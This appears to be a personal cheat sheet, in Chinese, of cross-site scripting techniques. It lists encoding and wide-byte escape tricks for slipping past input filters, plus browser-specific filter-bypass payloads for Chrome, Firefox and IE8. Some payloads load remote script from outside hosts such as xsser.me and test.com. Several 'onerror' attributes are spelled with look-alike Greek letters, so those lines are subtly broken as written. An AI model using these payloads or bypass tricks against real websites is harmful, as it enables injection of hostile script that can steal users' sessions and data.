xss碎片

html特殊编码

&lt;          <

&gt;          >

&quot;       "

'               '

\               \

/               /

• 先加'"></\测试看过滤情况。

innerHTML

\没有过滤

<可以表示为\u003c 或\x3c

>可以表示为\u003e 或\x3e

空格 \u0020 或 \x20

分隔符可以试试/**/

\反斜杠有时候可以转义正常语句，改变语句的执行。

如果gbxxx系列字符集可尝试宽字节

双引号表示为%c0%22

\ %c0%5c(后三位是表示字符)

前半个字符被解释错误，后半个字符解释出想要的结果；

换行符：%0a

josn：http://www.w3school.com.cn/json/json_syntax.asp

过chrome

<!--<img src="--><img src=x οnerrοr=alert(1)//">

"><svg><script xlink:href=//********></script> chrome的bypass

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=">click<a>

过fiefox

"><script src=http://xsser.me/*****></script>

过IE

IE8 xss filter bypass (xss过滤器绕过)

οnerrοr="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"

新标签

<isindex type=image src=1 οnerrοr=alert(1)>